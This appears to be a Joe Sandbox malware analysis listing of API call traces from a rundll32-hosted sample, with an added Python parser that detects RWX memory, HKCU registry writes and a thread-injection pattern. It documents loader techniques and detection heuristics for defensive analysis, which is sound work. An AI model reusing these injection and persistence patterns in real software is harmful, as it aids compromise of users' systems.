                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Open$Closelstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 4131162436-0
                              • Opcode ID: 2211f6c46a68ccb65e15905a45aab01a455f163bd1d6d1da2cdc19ee9a9ddbca
                              • Instruction ID: 5edce2575a95afca7dd3cdaa70235134fb9c859c67d12140547002d30e6af3fa
                              • Opcode Fuzzy Hash: 2211f6c46a68ccb65e15905a45aab01a455f163bd1d6d1da2cdc19ee9a9ddbca
                              • Instruction Fuzzy Hash: 43213872A10209FFDB01DF95DD86CAEBBBDFB44254B104065F602A3111E771AE64DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,05F3B7F0,?), ref: 0594B7B9
                              • RegOpenKeyA.ADVAPI32(80000001,05F3B7F0,?), ref: 0594B7C3
                              • lstrlen.KERNEL32(05F3B7F0,00000000,00000000,00000000,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C,00000008,00000003), ref: 0594B7E2
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateOpenlstrlen
                              • String ID:
                              • API String ID: 2865187142-0
                              • Opcode ID: bc0bd6b72005292dc1cf6c95c5d73f7b57cbfbd586d5ffde8f94006f9f3fa9a4
                              • Instruction ID: 14e5595849a241b44c1211351c5f610cfdbcacd5d80d3e521be5e17b9383c43e
                              • Opcode Fuzzy Hash: bc0bd6b72005292dc1cf6c95c5d73f7b57cbfbd586d5ffde8f94006f9f3fa9a4
                              • Instruction Fuzzy Hash: 4AF04976104208FFEB119F91DC89FABBB7DEB456A4F148009F90689240DA70DA80CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetEvent.KERNEL32(00000330,0594C3DB), ref: 0594E83B
                                • Part of subcall function 059334FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0594E846), ref: 05933528
                                • Part of subcall function 059334FF: RtlDeleteCriticalSection.NTDLL(0595A3E0), ref: 0593355B
                                • Part of subcall function 059334FF: RtlDeleteCriticalSection.NTDLL(0595A400), ref: 05933562
                                • Part of subcall function 059334FF: ReleaseMutex.KERNEL32(0000059C,00000000,?,?,?,0594E846), ref: 0593358B
                                • Part of subcall function 059334FF: CloseHandle.KERNEL32(?,?,0594E846), ref: 05933597
                                • Part of subcall function 059334FF: ResetEvent.KERNEL32(00000000,00000000,?,?,?,0594E846), ref: 059335A3
                                • Part of subcall function 059334FF: CloseHandle.KERNEL32(?,?,0594E846), ref: 059335AF
                                • Part of subcall function 059334FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0594E846), ref: 059335B5
                                • Part of subcall function 059334FF: SleepEx.KERNEL32(00000064,00000001,?,?,0594E846), ref: 059335C9
                                • Part of subcall function 059334FF: HeapFree.KERNEL32(00000000,00000000,?,?,0594E846), ref: 059335ED
                                • Part of subcall function 059334FF: RtlRemoveVectoredExceptionHandler.NTDLL(057505B8), ref: 05933623
                                • Part of subcall function 059334FF: SleepEx.KERNEL32(00000064,00000001,?,?,0594E846), ref: 0593363F
                              • CloseHandle.KERNEL32(00000330), ref: 0594E850
                              • HeapDestroy.KERNELBASE(05B40000), ref: 0594E860
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                              • String ID:
                              • API String ID: 2773679374-0
                              • Opcode ID: 30e0190265641807119e334c0c144cf8b0b2a29ab7d1a26b3f552323d797036c
                              • Instruction ID: c97c207388cf3b3949ae9b02472871ed73f829ac787730ce75531735f96e3226
                              • Opcode Fuzzy Hash: 30e0190265641807119e334c0c144cf8b0b2a29ab7d1a26b3f552323d797036c
                              • Instruction Fuzzy Hash: 31E062707283419BDF206F75E84EE177FACBB045827490924B405D2245DF24D854EB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.417936945.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_7e0000_rundll32.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID: X
                              • API String ID: 544645111-3081909835
                              • Opcode ID: a1d2d7a04a4218a24bdf6c05c71c0ad36df5e92cfbdc4d984bac015a8c813b41
                              • Instruction ID: 03230735a31956401cfba6a1b588459eead6e1131ce7cf48d06b1116e80d23ac
                              • Opcode Fuzzy Hash: a1d2d7a04a4218a24bdf6c05c71c0ad36df5e92cfbdc4d984bac015a8c813b41
                              • Instruction Fuzzy Hash: D3418CB5E01628CFDB64CF19C880B88FBB1BF49304F55819AC909AB356D735AE85CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 059371B4: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0595A170,00000000,05945D81,?,0593F2F7,?), ref: 059371D3
                                • Part of subcall function 059371B4: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0595A170,00000000,05945D81,?,0593F2F7,?), ref: 059371DE
                                • Part of subcall function 059371B4: _wcsupr.NTDLL ref: 059371EB
                                • Part of subcall function 059371B4: lstrlenW.KERNEL32(00000000), ref: 059371F3
                              • ResumeThread.KERNEL32(00000004,?,0593F2F7,?), ref: 05945D8F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                              • String ID: v
                              • API String ID: 3646851950-1801730948
                              • Opcode ID: 4ca58a04c57760958cdb0cc69eba71acd3bf7cc4fce21920978d8c595cb6ab70
                              • Instruction ID: 558b8bc3f0cd216c8530cafbce498d08ac010d8bba0f8209315fe9c2d14a4d72
                              • Opcode Fuzzy Hash: 4ca58a04c57760958cdb0cc69eba71acd3bf7cc4fce21920978d8c595cb6ab70
                              • Instruction Fuzzy Hash: 70D05E38208300ABE7216790CE0FF26BD96AF80B51F01C454F98650064D7729CA0AA44
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 05943253
                              • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 0594329A
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                              • String ID:
                              • API String ID: 552344955-0
                              • Opcode ID: c958f1cd21c283ac9d88044bbbbe6256929c5040e7b8924b4dddfdc1b4818570
                              • Instruction ID: ea8641986accc5612410dc447558c1ff7c7d1deccb1403574a59328e23ad3f83
                              • Opcode Fuzzy Hash: c958f1cd21c283ac9d88044bbbbe6256929c5040e7b8924b4dddfdc1b4818570
                              • Instruction Fuzzy Hash: C9117071A00208BBCB119FF9C848FAEBBBDFF85654F214459E40197240EBB49E45CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,059402F2,69B25F44,?,?,00000000), ref: 059493AD
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,059402F2), ref: 0594940E
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$FileFreeHeapSystem
                              • String ID:
                              • API String ID: 892271797-0
                              • Opcode ID: 95fd2ce4a1eedcc1616497ad0f25f7a6171deb05527d08aa85a64b927f20ad76
                              • Instruction ID: 9c2a3689aa3b92c04496443c1356fbe830378c3631418d30dc4811ca4e026c0f
                              • Opcode Fuzzy Hash: 95fd2ce4a1eedcc1616497ad0f25f7a6171deb05527d08aa85a64b927f20ad76
                              • Instruction Fuzzy Hash: 05113AB5914209EBCF10EBA4D94AE9EBBBCEB08215F000261A905E2150DB74AB54DF64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(0595A400), ref: 0594E873
                              • RtlLeaveCriticalSection.NTDLL(0595A400), ref: 0594E8AF
                                • Part of subcall function 05931A0A: lstrlen.KERNEL32(?,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977,0594893A,?,?), ref: 05931A58
                                • Part of subcall function 05931A0A: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931A6A
                                • Part of subcall function 05931A0A: lstrcpy.KERNEL32(00000000,?), ref: 05931A79
                                • Part of subcall function 05931A0A: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931A8A
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                              • String ID:
                              • API String ID: 1872894792-0
                              • Opcode ID: 88d33daa5c832f5838ab12c53642ea1598a291304338d0ec2243e148a3b57a48
                              • Instruction ID: 7f0d7ceb00cac615ff3ff28ede0b2684661eba080422301e8f82b51ef3686d97
                              • Opcode Fuzzy Hash: 88d33daa5c832f5838ab12c53642ea1598a291304338d0ec2243e148a3b57a48
                              • Instruction Fuzzy Hash: 12F0A7352153159F86206F589889C75FBACFBC5127312425AED1653300CB755C519B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InterlockedIncrement.KERNEL32(0595A05C), ref: 0593C9BE
                                • Part of subcall function 05942331: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0594235C
                                • Part of subcall function 05942331: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05942369
                                • Part of subcall function 05942331: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 059423F5
                                • Part of subcall function 05942331: GetModuleHandleA.KERNEL32(00000000), ref: 05942400
                                • Part of subcall function 05942331: RtlImageNtHeader.NTDLL(00000000), ref: 05942409
                                • Part of subcall function 05942331: RtlExitUserThread.NTDLL(00000000), ref: 0594241E
                              • InterlockedDecrement.KERNEL32(0595A05C), ref: 0593C9E2
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                              • String ID:
                              • API String ID: 1011034841-0
                              • Opcode ID: e882677675d3449b1890a958d678399e1ac21258f785d6d699482feeb7376496
                              • Instruction ID: 5ad93da34d608d9c4f6069a0689fbd835bab90c4cad8d1b0137508f28e2e6c75
                              • Opcode Fuzzy Hash: e882677675d3449b1890a958d678399e1ac21258f785d6d699482feeb7376496
                              • Instruction Fuzzy Hash: 5BE0123235CA22D7CF219A749C4AF6EAA69FF44A92F024614F945F1154EB218C6097D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 059455E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0594561D
                                • Part of subcall function 059455E4: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 05945653
                                • Part of subcall function 059455E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0594565F
                                • Part of subcall function 059455E4: lstrcmpi.KERNEL32(?,00000000), ref: 0594569C
                                • Part of subcall function 059455E4: StrChrA.SHLWAPI(?,0000002E), ref: 059456A5
                                • Part of subcall function 059455E4: lstrcmpi.KERNEL32(?,00000000), ref: 059456B7
                                • Part of subcall function 059455E4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05945708
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,059560E0,0000002C,059490D3,05F38E36,?,00000000,0594A484), ref: 05951E2C
                                • Part of subcall function 0594A806: GetProcAddress.KERNEL32(?,00000000), ref: 0594A82F
                                • Part of subcall function 0594A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05946230,00000000,00000000,00000028,00000100), ref: 0594A851
                              • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,059560E0,0000002C,059490D3,05F38E36,?,00000000,0594A484,?,00000318), ref: 05951EB7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                              • String ID:
                              • API String ID: 4138075514-0
                              • Opcode ID: 29331b09892f01540f4909c945ade585ccba3bd3a9d5e053f03638c39c019e0c
                              • Instruction ID: 3306d743c9fae4469ad5bab8ac83523ff3ac3b95555701eefffa1ece68db31d1
                              • Opcode Fuzzy Hash: 29331b09892f01540f4909c945ade585ccba3bd3a9d5e053f03638c39c019e0c
                              • Instruction Fuzzy Hash: 7A21E271E01228EBCF11DFA5DC84ADEBBB9FF48720F10812AE955B6250C3345A65DFA4
                              Uniqueness

                              Uniqueness Score: -1.00%
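
The function entries above record raw API calls with hex arguments recovered from the stack at call time. Reading them by hand means mapping each hex value back to its SDK constant: 0x3000 is MEM_COMMIT|MEM_RESERVE and 0x40 is PAGE_EXECUTE_READWRITE in the NtAllocateVirtualMemory and VirtualProtect entries, 0x80000001 is HKEY_CURRENT_USER in the RegCreateKeyA entry, and 0x20119 is KEY_READ|KEY_WOW64_64KEY in the RegOpenKeyExA entry. The following is an added example, not Joe Sandbox code and not part of this report: a small Python parser for this reference-line format that decodes those argument positions and flags the patterns a practitioner would triage first (RWX memory, a value written under HKCU, a process-name check followed by ResumeThread). The constant values are the Win32 SDK definitions and the argument positions follow the documented prototypes; the sample trace is copied from the entries above, not captured live. Only the documented parameter positions are interpreted, because the sandbox's argument lists can carry stale stack values past the real parameter count, and a `?` argument is treated as unknown rather than guessed.

```python
"""Decode Joe Sandbox-style API reference lines and flag the memory and
registry patterns visible in the function listing.

Added example (not Joe Sandbox code). Constants are the Win32 SDK values;
argument positions follow the documented prototypes. SAMPLE_TRACE is copied
from the report's function entries, not captured here.
"""
import re
from typing import Optional

PAGE_EXECUTE_READWRITE = 0x40
HKEY_CURRENT_USER = 0x80000001
KEY_READ = 0x20019
KEY_WOW64_64KEY = 0x0100

# 0-based index of the protection / root-key argument per documented prototype.
PROTECT_ARG = {"NtAllocateVirtualMemory": 5, "VirtualAlloc": 3, "VirtualProtect": 2}
ROOTKEY_ARG = {"RegCreateKeyA": 0, "RegOpenKeyA": 0, "RegOpenKeyExA": 0}

# Matches both forms seen in the report:
#   '• Part of subcall function 05947950: NtAllocateVirtualMemory.NTDLL(...), ref: 05947981'
#   '• memset.NTDLL ref: 0594A477'   (no argument list recovered)
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_0-9@]+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


def parse_arg(tok: str) -> Optional[int]:
    """'?' means the sandbox could not recover that argument from the stack."""
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)  # also handles '-0000001C'


def parse_call(line: str) -> Optional[dict]:
    """Return {api, module, args, ref, subcall} or None for non-API lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
    return {"api": m["api"], "module": m["mod"], "args": args,
            "ref": int(m["ref"], 16), "subcall": m["sub"]}


def decode_sam(sam: int) -> str:
    """Name the registry access-mask bits (0x20119 -> KEY_READ|KEY_WOW64_64KEY)."""
    names = []
    if (sam & KEY_READ) == KEY_READ:
        names.append("KEY_READ")
    if sam & KEY_WOW64_64KEY:
        names.append("KEY_WOW64_64KEY")
    rest = sam & ~(KEY_READ | KEY_WOW64_64KEY)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def analyze(trace: str) -> list:
    """Run the pattern checks over one function's trace; returns finding strings."""
    calls = [c for c in map(parse_call, trace.splitlines()) if c]
    apis = {c["api"] for c in calls}
    findings = []
    for c in calls:
        api, a, where = c["api"], c["args"], f"{c['api']}@{c['ref']:08X}"
        i = PROTECT_ARG.get(api)
        if i is not None and len(a) > i and a[i] == PAGE_EXECUTE_READWRITE:
            findings.append(f"{where}: PAGE_EXECUTE_READWRITE (RWX) memory")
        i = ROOTKEY_ARG.get(api)
        if (i is not None and len(a) > i and a[i] == HKEY_CURRENT_USER
                and "RegSetValueExA" in apis):
            findings.append(f"{where}: key under HKEY_CURRENT_USER opened and a value written")
        if api == "RegOpenKeyExA" and len(a) > 3 and a[3] is not None:
            findings.append(f"{where}: samDesired={decode_sam(a[3])}")
    # Target selection by image name followed by resuming a thread is the
    # shape a thread-injection loader leaves in a trace.
    if {"GetProcessImageFileNameW", "ResumeThread"} <= apis:
        findings.append("process image name inspected, then ResumeThread: "
                        "thread-injection loader pattern (target chosen by name)")
    return findings


# Constructed from lines in the report's function entries (same format, same values).
SAMPLE_TRACE = """\
• memset.NTDLL ref: 0594A477
  • Part of subcall function 05947950: NtAllocateVirtualMemory.NTDLL(0594EB0F,00000000,00000000,0594EB0F,00003000,00000040), ref: 05947981
  • Part of subcall function 05931A0A: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931A6A
  • Part of subcall function 05931A0A: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931A8A
  • Part of subcall function 059455E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0594561D
  • Part of subcall function 0594B7A4: RegCreateKeyA.ADVAPI32(80000001,05F3B7F0,?), ref: 0594B7B9
• RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 059362A8
• RegSetValueExA.KERNEL32(05959068,00000003,00000000,00000003,05959068,00000028), ref: 05946CB3
• GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0595A170,00000000,05945D81,?,0593F2F7,?), ref: 059371D3
• ResumeThread.KERNEL32(00000004,?,0593F2F7,?), ref: 05945D8F
"""

if __name__ == "__main__":
    for finding in analyze(SAMPLE_TRACE):
        print(finding)
```

Running it on the sample flags the RWX allocation at 05947981 and the VirtualProtect to 0x40 at 05931A6A, skips the second VirtualProtect (new protection unrecovered) and the PAGE_READWRITE VirtualAlloc, reports the HKCU key that is created in the same function that calls RegSetValueExA, decodes the 0x20119 access mask, and notes the name-check-then-ResumeThread pairing. The HKCU check is deliberately per function (the listing groups calls that way), so a key opened read-only in one function is not mistaken for a write in another.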

                              APIs
                              • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,05950977,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059518D5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: b45cdf2e6852559ea5c3debfc36d7b0511d66675a2806a47ae3af18c51b272b3
                              • Instruction ID: 3d118ae656aab3c1a0e8546e18917fab3224b623a47a1de810efc93ec1ed0509
                              • Opcode Fuzzy Hash: b45cdf2e6852559ea5c3debfc36d7b0511d66675a2806a47ae3af18c51b272b3
                              • Instruction Fuzzy Hash: 8731B475A00215EFCB10DF98E885EADBBFAFB44330F514569EA45AB200C734AD61DB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleA.KERNEL32(?,059599DC,-0000000C,?,?,?,0594C01A,00000006,?,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 05934ADA
                                • Part of subcall function 059374AE: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0595A400), ref: 059374C5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HandleInformationModuleProcessQuery
                              • String ID:
                              • API String ID: 2776635927-0
                              • Opcode ID: e166eba4dfebdb7354d03e2520e41bdf27592816bcaddb2e907f537a1e145142
                              • Instruction ID: 1fe044fa57543d1ee47dfabc30eee5330e47588aa050777c30f585c277ca941e
                              • Opcode Fuzzy Hash: e166eba4dfebdb7354d03e2520e41bdf27592816bcaddb2e907f537a1e145142
                              • Instruction Fuzzy Hash: 41218135600205EFDF20CF96C49AE6E77BDFF44294726852AE94ACB250D772E901DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ___delayLoadHelper2@8.DELAYIMP ref: 05953090
                                • Part of subcall function 059531E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,05930000), ref: 0595325C
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionHelper2@8LoadRaise___delay
                              • String ID:
                              • API String ID: 123106877-0
                              • Opcode ID: db895d6f7594839f76aed77dc0e4825db5c3fe1b25fbef2b0175f3d5a7ce7a38
                              • Instruction ID: 17e831790ae0e5f62d218924aca8e7ed07934fcc302a9db8d4926a5dfb49fd79
                              • Opcode Fuzzy Hash: db895d6f7594839f76aed77dc0e4825db5c3fe1b25fbef2b0175f3d5a7ce7a38
                              • Instruction Fuzzy Hash: AFA00295269201BD3505D5755D06C37571DC4C49B17604D1DEC1284040955219651371
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ___delayLoadHelper2@8.DELAYIMP ref: 05953090
                                • Part of subcall function 059531E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,05930000), ref: 0595325C
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionHelper2@8LoadRaise___delay
                              • String ID:
                              • API String ID: 123106877-0
                              • Opcode ID: be5cfedcb995f42093c30a81be8abd61b6f275ebb93239562e0e93c47d9cbfa9
                              • Instruction ID: 7a086272991c02904b3442b2ff24ead03a6c66e25975505ff9c40f7956b9fce6
                              • Opcode Fuzzy Hash: be5cfedcb995f42093c30a81be8abd61b6f275ebb93239562e0e93c47d9cbfa9
                              • Instruction Fuzzy Hash: 79A002952A56017D3515D5755D06C37571DC4D09717604E1DFC1194040955219651371
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: cba01f6f2aaa8e5c82cfe619d3a600b3fb159ddb9213a719504b854df4821f9d
                              • Instruction ID: 4a8c28609b50905a9c4f551fa216e4e851b93bb0852f5b637d4716361d1df6a1
                              • Opcode Fuzzy Hash: cba01f6f2aaa8e5c82cfe619d3a600b3fb159ddb9213a719504b854df4821f9d
                              • Instruction Fuzzy Hash: 41B01231028300EBCA014F20DD06F05FF21AB54701F014410B20C800608B310878FB08
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 7a48c778be095871dbe5d588dbbce9cef899be8e46a451381c68a1998af262ce
                              • Instruction ID: f14924fe92caf8055a4299aebe56dc7878af9067fb77957a96699b503eeecf79
                              • Opcode Fuzzy Hash: 7a48c778be095871dbe5d588dbbce9cef899be8e46a451381c68a1998af262ce
                              • Instruction Fuzzy Hash: 1FB01271128300EBCA014F20DE06F05FF21A754701F014010B30C440608B310834FB08
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.417936945.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_7e0000_rundll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 4700240f24b2d535769b4c3658031a0ebcca38528b45e4fb341cfcf4d963d156
                              • Instruction ID: fd2516dba8b8348052d4ad20603fa01cd666dd8948dc38ad4926fba79f1219a0
                              • Opcode Fuzzy Hash: 4700240f24b2d535769b4c3658031a0ebcca38528b45e4fb341cfcf4d963d156
                              • Instruction Fuzzy Hash: 1541F2B49012068FDB04CF69C5997AEBBF0FF48304F24856DD858AB341E77AA946CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05951ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                                • Part of subcall function 05951ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                                • Part of subcall function 05951ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                                • Part of subcall function 05951ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,76CDF710,00000000,00000000,?,?,?,0593E30A,?), ref: 0594FDB6
                                • Part of subcall function 0594AF83: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,059363CD,00000000,00000001,-00000007,?,00000000), ref: 0594AFA6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseFreememcpy
                              • String ID:
                              • API String ID: 1301464996-0
